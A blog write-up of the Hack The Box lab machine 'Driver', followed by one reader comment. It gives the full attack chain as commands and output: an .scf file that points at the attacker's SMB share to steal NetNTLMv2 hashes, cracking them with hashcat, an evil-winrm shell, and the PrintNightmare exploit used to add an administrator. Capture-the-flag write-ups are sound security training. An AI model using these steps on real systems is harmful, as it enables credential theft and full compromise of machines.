Driver

Enumeration

NMAP

┌──(root💀kali)-[~]
└─# nmap -sV -sC -T4 -p- -v 10.10.11.106

Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2021-11-18T18:20:53
|_  start_date: 2021-11-18T18:12:04
|_clock-skew: mean: 7h04m58s, deviation: 0s, median: 7h04m58s

SMB and NetNTLMv2 hash grabbing

There is a http service running on driver.htb on port 80. It requires me to HTTP authenticate with username:password when trying to access it. I tried default credentials such as admin:password, admin:admin which led me in.

It seems we have an upload functionality. I have tried to upload reverse shell but I could not get to find any useful directory where files could be uploaded also no LFI was available. I thought to research the other services since we have SMB which is used for file sharing if we can use it to somehow get a reverse shell and found this awesome post: https://sql–injection.blogspot.com/p/smb.html

In our case, we have to create the file, find a way to upload it and we also have to get the information back to our own share through responder.

┌──(root💀kali)-[~]
└─# cat steal-hash.scf     
[Shell]

Command=2

IconFile=\\10.10.14.7\share\pentestlab.ico

[Taskbar]

Command=ToggleDesktop
┌──(root💀kali)-[~]
└─# responder --lm -v -I tun0
[+] Listening for events...                                                                                                                                                                                                                  

[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>
[SMB] NTLMv2 Hash     : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash     : <EDITED>

Analyse the hash with hashid in order to confirm the identity of the hash.

┌──(root💀kali)-[~]
└─# cat to-crack.hash 
<EDITED>

┌──(root💀kali)-[~]
└─# hashid to-crack.hash                                              
--File 'to-crack.hash'--
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
Analyzing '<EDITED>'
[+] NetNTLMv2 
--End of file 'to-crack.hash'--

The hash is NetNTLMv2. Now we have to crack it with hashcat.

┌──(root💀kali)-[~]
└─# hashcat --help |grep NetNTLMv2                                    
   5600 | NetNTLMv2                                        | Network Protocols


┌──(root💀kali)-[~]
└─# hashcat -a 0 -m 5600 to-crack.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: to-crack.hash
................................

smbmap

┌──(root💀kali)-[~]
└─# smbmap -H 10.10.11.106 -u <EDITED> -p '<EDITED>'                                                                                                                                                                                          2 ⨯
[+] IP: 10.10.11.106:445        Name: driver.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Foothold

Nice Post about evil-winrm : https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md

Our enumeration discovered another open port 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) .

## Description & Purpose
This shell is the ultimate WinRM shell for hacking/pentesting.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol
that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating
Systems in order to make life easier to system administrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only
if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting
phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate
purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM
protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.

Now that we have some understanding about the tool and we have credentials, we can proceed to getting foothold.

┌──(root💀kali)-[~]
└─# evil-winrm 

Evil-WinRM shell v3.3

Error: missing argument: ip, user

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
    -S, --ssl                        Enable ssl
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname. FQDN for Kerberos auth (required)
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash HASH                  NTHash
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -n, --no-colors                  Disable colors
    -N, --no-rpath-completion        Disable remote path completion
    -l, --log                        Log the WinRM session
    -h, --help                       Display this help message


┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u <EDITED> -p '<EDITED>'                                                                                                                                                                                      1 ⨯
Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> 

Windows Recon

This page is amazing and provides plenty of information on windows recon phase.

https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md#post-exploitation

  1. winPEAS.exe
## Basic information

The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.

It should take only a **few seconds** to execute almost all the checks and **some seconds/minutes during the lasts checks searching for known filenames** that could contain passwords (the time depened on the number of files in your home folder). By default only **some** filenames that could contain credentials are searched, you can use the **searchall** parameter to search all the list (this could will add some minutes).

To enable colored version of winPEAS change the registry key value:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
The operation completed successfully.

Analysis of the massive output winPEAS provides, allows me to discover spoolsv service running on the local computer. I remember from previous machines that spoolsv is a print spooler service. Among other findings, I decided to proceed with this one since a possible exploit is well documented here: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

  Enumerating IPv4 connections

  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               80            0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         712             svchost
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               49408         0.0.0.0               0               Listening         448             wininit
  TCP        0.0.0.0               49409         0.0.0.0               0               Listening         868             svchost
  TCP        0.0.0.0               49410         0.0.0.0               0               Listening         1188            spoolsv
  TCP        0.0.0.0               49411         0.0.0.0               0               Listening         816             svchost
  TCP        0.0.0.0               49412         0.0.0.0               0               Listening         568             services
  TCP        0.0.0.0               49413         0.0.0.0               0               Listening         576             lsass
  TCP        10.10.11.106          139           0.0.0.0               0               Listening         4               System
  TCP        10.10.11.106          5985          10.10.14.7            47132           Time Wait         0               Idle
  TCP        10.10.11.106          5985          10.10.14.7            47134           Established       4               System

  Enumerating IPv6 connections

  Protocol   Local Address                               Local Port    Remote Address                              Remote Port     State             Process ID      Process Name

  TCP        [::]                                        80            [::]                                        0               Listening         4               System
  TCP        [::]                                        135           [::]                                        0               Listening         712             svchost
  TCP        [::]                                        445           [::]                                        0               Listening         4               System
  TCP        [::]                                        5985          [::]                                        0               Listening         4               System
  TCP        [::]                                        47001         [::]                                        0               Listening         4               System
  TCP        [::]                                        49408         [::]                                        0               Listening         448             wininit
  TCP        [::]                                        49409         [::]                                        0               Listening         868             svchost
  TCP        [::]                                        49410         [::]                                        0               Listening         1188            spoolsv
  TCP        [::]                                        49411         [::]                                        0               Listening         816             svchost
  TCP        [::]                                        49412         [::]                                        0               Listening         568             services
  TCP        [::]                                        49413         [::]                                        0               Listening         576             lsass

Privilege Escalation

Download the exploit file on your local kali.

┌──(root💀kali)-[/opt]
└─# git clone https://github.com/calebstewart/CVE-2021-1675                                                                                                                                                                            130 ⨯

I have renamed the file to print-nightmare.ps1. And I have uploaded the file onto the victim machine as so:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> upload /opt/print-nightmare/print-nightmare.ps1
Info: Uploading /opt/print-nightmare/print-nightmare.ps1 to C:\Users\tony\Documents\print-nightmare.ps1                                                                                                                                      


Data: 238080 bytes of 238080 bytes copied

Info: Upload successful!

I am importing the script but I receive the following error due to the registry key being unset.

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1                                                                                                                                                                 
File C:\Users\<EDITED>\Documents\print-nightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.                   
At line:1 char:1                                                                                                                                                                                                                             
+ Import-Module ./print-nightmare.ps1                                                                                                                                                                                                        
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                                                                                                                                                        
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException                                                                                                                                                        
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand

To fix this I force the execution policy to an Unrestricted state:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy                          
Restricted
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy
Unrestricted

Creating administrator user:

*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll

Logging in as the newly created user:

┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u 0xdf -p '0xdf0xdf'

*Evil-WinRM* PS C:\Users\0xdf\Documents> whoami
driver\0xdf

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4bc<EDITED>

2 thoughts on “Driver

  1. I think this machine is really not realistic. Is it a printer? Is it a client? How can I expect a scf-file being executed automatically by a user when I upload it as a printer driver? That just doesn’t make since and would not appear like this in real world…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: